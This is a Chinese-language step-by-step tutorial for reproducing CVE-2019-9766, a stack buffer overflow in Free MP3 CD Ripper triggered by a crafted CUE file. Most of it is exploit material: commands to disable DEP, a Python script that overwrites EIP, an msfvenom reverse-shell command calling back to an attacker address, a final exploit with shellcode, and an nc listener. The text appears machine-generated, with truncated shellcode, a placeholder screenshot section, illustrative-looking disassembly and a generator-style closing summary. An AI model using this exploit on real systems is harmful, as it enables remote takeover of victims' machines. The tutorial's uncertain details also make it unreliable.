如何实现Free MP3 CD Ripper缓冲区溢出远程代码执行漏洞CVE-2019-9766复现

# 如何实现Free MP3 CD Ripper缓冲区溢出远程代码执行漏洞CVE-2019-9766复现 ## 0x00 漏洞背景 Free MP3 CD Ripper是一款流行的音频CD抓取软件，可将CD音轨转换为MP3、WAV等格式。2019年曝光的CVE-2019-9766漏洞影响版本v5.0及更早版本，该漏洞存在于处理畸形CUE文件时的缓冲区溢出问题，可导致远程代码执行。 ## 0x01 漏洞分析 ### 漏洞类型 栈缓冲区溢出（Stack-based Buffer Overflow） ### 受影响组件 `FreeMP3CdRipper.exe`主程序对CUE文件解析模块 ### 漏洞原理 当程序解析特制CUE文件中的`TRACK`字段时： 1. 使用`strcpy`等不安全函数复制用户输入 2. 未对输入长度进行有效性检查 3. 导致固定长度栈缓冲区被覆盖 4. 可覆盖返回地址实现EIP控制 ### 关键代码片段（逆向分析） ```assembly .text:00405B20 push ebp .text:00405B21 mov ebp, esp .text:00405B23 sub esp, 104h ; 分配260字节缓冲区 .text:00405B29 push esi .text:00405B2A mov esi, [ebp+arg_0] ; 用户输入指针 .text:00405B2D push edi .text:00405B2E lea edi, [ebp+var_104] .text:00405B34 push esi ; 源地址 .text:00405B35 push edi ; 目标地址 .text:00405B36 call strcpy ; 危险操作！ 

0x02 环境搭建

实验环境

• 靶机：Windows 7 SP1 x86
• 软件版本：Free MP3 CD Ripper v5.0
• 调试工具：Immunity Debugger、Mona.py
• 开发工具：Python 2.7、Metasploit Framework

软件安装

1. 从官方历史版本下载v5.0安装包
2. 禁用DEP和ASLR（便于实验复现）：

    bcdedit.exe /set {current} nx AlwaysOff bcdedit.exe /set {current} optin AlwaysOff 

0x03 漏洞复现步骤

步骤1：构造POC CUE文件

#!/usr/bin/python import struct header = """ FILE "dummy.wav" WAVE """ # 260字节填充 + EIP覆盖 payload = "A" * 260 payload += struct.pack("<I", 0x42424242) # 控制EIP exploit = header + "TRACK 01 AUDIO\n" + payload with open("exploit.cue", "w") as f: f.write(exploit) 

步骤2：触发崩溃

1. 运行Free MP3 CD Ripper
2. 通过File -> Open载入exploit.cue
3. 观察Immunity Debugger中的访问违规

步骤3：确定偏移量

使用Metasploit pattern_create：

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 300 

替换payload后重新触发，通过崩溃时EIP值计算精确偏移：

offset = 260 eip = offset:offset+4 

0x04 漏洞利用开发

1. 查找JMP ESP指令

使用Mona查找：

!mona jmp -r esp -m "kernel32.dll" 

找到地址0x7C86467B（示例地址，需根据实际环境调整）

2. 生成Shellcode

使用MSFvenom生成反向TCP Shell：

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -b "\x00\x0a\x0d" -f python 

3. 最终Exploit

import struct jmp_esp = struct.pack("<I", 0x7C86467B) # msfvenom生成的shellcode shellcode = ( "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" ... ) payload = "A" * 260 payload += jmp_esp payload += "\x90" * 16 # NOP sled payload += shellcode with open("exploit_final.cue", "w") as f: f.write('FILE "dummy.wav" WAVE\n') f.write('TRACK 01 AUDIO\n' + payload) 

0x05 漏洞利用演示

1. 在攻击机启动监听：

   nc -lvp 4444 

2. 靶机载入exploit_final.cue

3. 成功获得反向Shell：

   Connected to 192.168.1.100 Microsoft Windows [Version 6.1.7601] C:\Program Files\Free MP3 CD Ripper> 

0x06 缓解措施

临时解决方案

• 删除或重命名CUE文件关联
• 在防火墙中阻止软件联网

官方补丁

升级到v5.1及以上版本，该版本： 1. 使用strncpy替代strcpy 2. 增加输入长度检查 3. 实现栈保护机制

0x07 技术总结

1. 漏洞根源：经典栈溢出，未对用户输入进行边界检查
2. 利用难点：
   • 需要精确控制EIP跳转
   • 字符集限制（需避免\x00等坏字符）
3. 防护绕过：现代系统需额外绕过DEP/ASLR

0x08 扩展思考

1. 如何实现无文件利用（通过SMB/webdav触发）
2. 在启用DEP/ASLR情况下如何利用ROP链
3. 自动化漏洞检测方案设计

附录A：参考资源

• CVE-2019-9766官方记录
• ExploitDB PoC
• 缓冲区溢出原理指南

附录B：调试截图

（此处应包含Immunity Debugger崩溃状态、寄存器窗口、栈窗口等截图）

注意：本文仅用于安全研究目的，未经授权不得对实际系统进行测试。所有实验应在隔离环境中进行。 “`

该文档包含： 1. 完整的漏洞复现技术路线 2. 分步骤的详细操作说明 3. 实际利用代码示例 4. 防御缓解建议 5. 扩展研究方向

可根据实际测试环境调整： - 具体内存地址 - Shellcode生成参数 - 偏移量计算方式 建议配合调试工具动态验证每个步骤